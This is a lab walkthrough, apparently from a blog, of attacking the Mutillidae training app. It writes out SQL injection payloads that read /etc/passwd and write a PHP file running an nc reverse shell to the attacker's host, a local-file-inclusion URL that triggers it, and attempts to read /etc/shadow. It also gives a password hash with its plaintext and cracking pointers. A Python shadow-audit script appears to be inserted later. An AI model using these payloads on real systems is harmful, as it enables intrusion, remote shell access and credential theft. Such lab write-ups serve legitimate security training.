1. Using SQL injection to read and write files
Using PHP's load_file function to read files, I successfully read /etc/passwd, but could not read /etc/shadow. I can't figure out why.
http://192.168.0.119/mutillidae/index.php?page=user-info.php&username=kobe' union select 1,load_file("/etc/passwd"),null,null,null%23&password=aaa&user-info-php-submit-button=View+Account+Details
' union select 1,load_file("/etc/shadow"),null,null,null%23&password=aaa&user-info-php-submit-button=View+Account+Details
Use PHP's outfile() function to write a file.
First, on the page
http://192.168.0.119/mutillidae/index.php?page=user-info.php
enter the following in the Name field:
kobe' union select null,'<?passthru("nc -e /bin/sh 192.168.0.104 8080");?>',null,null,null into outfile '/tmp/reverse.php #
Leave the password empty and click View Account Details directly. This submits the data with a GET request, and the file /tmp/reverse.php is created on the server.
2. Using the Local File Inclusion vulnerability to run that file and get a reverse shell
My Kali Linux IP address is 192.168.0.104. Listen on port 8080 on Kali,
then open the browser and enter the address below; this gives a reverse shell.
http://192.168.0.119/mutillidae/index.php?page=../../../../../tmp/reverse.php
3. The most fun part of Local File Inclusion: I can browse /etc/passwd directly, but when I try to browse /etc/shadow I get an error. Getting the contents of /etc/shadow would certainly be a wonderful thing.
http://192.168.0.119/mutillidae/index.php?page=../../../../../etc/passwd
Warning: include(../../../../../etc/shadow) []: failed to open stream: Permission denied in /var/www/mutillidae/index.php on line 469
Warning: include() []: Failed opening '../../../../../etc/shadow' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/mutillidae/index.php on line 469
4. Example:
A user on my local Kali Linux is named jack, with password ass123.
Open /etc/shadow and get jack's password hash. Where does this hash come from? Checking it with hash-identifier shows that it is a SHA-256 hash, so one can try:
jack:$6$P/OAszmX$q/Q6t6cFJS0yqEuK/Y0gbVeiE4hw7YXENeYI.vxf3KPFG4i2M3zCIUtjJyMHq7ozOd.hRvz/UhvsdjARM08f80:17473:0:99999:7:::
hash-identifier
HASH: $6$P/OAszmX$q/Q6t6cFJS0yqEuK/Y0gbVeiE4hw7YXENeYI.vxf3KPFG4i2M3zCIUtjJyMHq7ozOd.hRvz/UhvsdjARM08f80
Possible Hashs:
[+] SHA-256
But I know this hash should be salted, so maybe it is worth trying JohnTheRipper.
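In a crypt(5) password field the text between the first two `$` signs names the scheme: `$6$` is glibc's SHA-512-based crypt, with the salt (`P/OAszmX` here) between the second and third `$` and 5000 rounds unless a `rounds=` parameter is present, which is why the hash is salted and why a plain SHA-256 lookup table will not match it. As an added example, not from the original post, the Python parser below classifies /etc/shadow records by that prefix, extracts salt and iteration count, and flags accounts that still use a weak scheme so an administrator can schedule rehashing; only the jack line comes from the post, the daemon and legacy records are constructed.

```python
from datetime import date, timedelta

# Constructed sample /etc/shadow content: the jack record quoted above plus a
# locked system account and a legacy md5crypt account made up for the example.
SAMPLE_SHADOW = """\
jack:$6$P/OAszmX$q/Q6t6cFJS0yqEuK/Y0gbVeiE4hw7YXENeYI.vxf3KPFG4i2M3zCIUtjJyMHq7ozOd.hRvz/UhvsdjARM08f80:17473:0:99999:7:::
daemon:*:17473:0:99999:7:::
legacy:$1$saltsalt$AAAAAAAAAAAAAAAAAAAAAA:15000:0:99999:7:::
"""

# crypt(5) identifiers: id -> (scheme, acceptable in a modern audit, default rounds)
SCHEMES = {
    "1": ("md5crypt", False, 1000),       # fixed iteration count
    "5": ("sha256crypt", True, 5000),     # glibc default when no rounds= parameter
    "6": ("sha512crypt", True, 5000),
    "y": ("yescrypt", True, None),        # cost lives in its own parameter field
}

def classify_hash(field):
    """Return (scheme, acceptable, salt, rounds) for one shadow password field."""
    if field in ("", "*") or field.startswith("!"):
        return ("locked", True, None, None)          # no usable password at all
    if not field.startswith("$"):
        return ("descrypt", False, field[:2], 25)    # traditional 13-char DES crypt
    parts = field.split("$")[1:]                     # e.g. ["6", "P/OAszmX", "<hash>"]
    scheme, acceptable, rounds = SCHEMES.get(parts[0], ("unknown", False, None))
    if parts[0] in ("5", "6") and parts[1].startswith("rounds="):
        rounds = int(parts[1][len("rounds="):])
        parts.pop(1)
    elif parts[0] == "y":
        parts.pop(1)                                 # skip the yescrypt parameter field
    salt = parts[1] if scheme != "unknown" and len(parts) >= 3 else None
    return (scheme, acceptable, salt, rounds)

def parse_shadow_line(line):
    """Parse one /etc/shadow record (9 colon-separated fields) into a dict."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError("shadow record must have 9 colon-separated fields")
    scheme, acceptable, salt, rounds = classify_hash(fields[1])
    # field 3 is the date of the last password change, in days since 1970-01-01
    changed = date(1970, 1, 1) + timedelta(days=int(fields[2])) if fields[2] else None
    return {"user": fields[0], "scheme": scheme, "acceptable": acceptable,
            "salt": salt, "rounds": rounds,
            "last_change": changed.isoformat() if changed else None}

def audit_shadow(text):
    """Return the records an audit should flag for a weak or unknown scheme."""
    records = [parse_shadow_line(ln) for ln in text.splitlines() if ln.strip()]
    return [r for r in records if not r["acceptable"]]
```

Running `audit_shadow` over a real shadow file (as root on a host you administer) lists the accounts whose hashes should be regenerated under a stronger scheme at the next password change.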
Or take a look at this website:
Sha-256 is a function of the Sha-2 algorithm (as are the 384, 512 and, more recently, 224-bit versions), which is the evolution of Sha-1, itself an evolution of Sha-0. The Sha-2 algorithm was developed by the NSA to answer the security problem of Sha-1, after the theoretical discovery of a 2^63-operation attack for collisions. This algorithm takes as input a message of maximum length 2^64 and outputs a 256-bit hash. It seems that sha256 is becoming more and more used in order to replace the old md5 hash function. I think that sha256 is actually the best replacement because of its good balance between online storage size and security. Like the other cryptographic functions of its "family", Sha-256 is one-way, so you can't find the plaintext with only the hash. You have to compare this hash to an online database, and that's what we do here with a 3,771,960,346 sha256 hash database. I looked for days to find any wordlist online. Then I computed for days to enlarge the wordlist and make it really unique.
There is another site that looks quite nice, but unfortunately it does not support SHA-256 at all.
https://www.onlinehashcrack.com/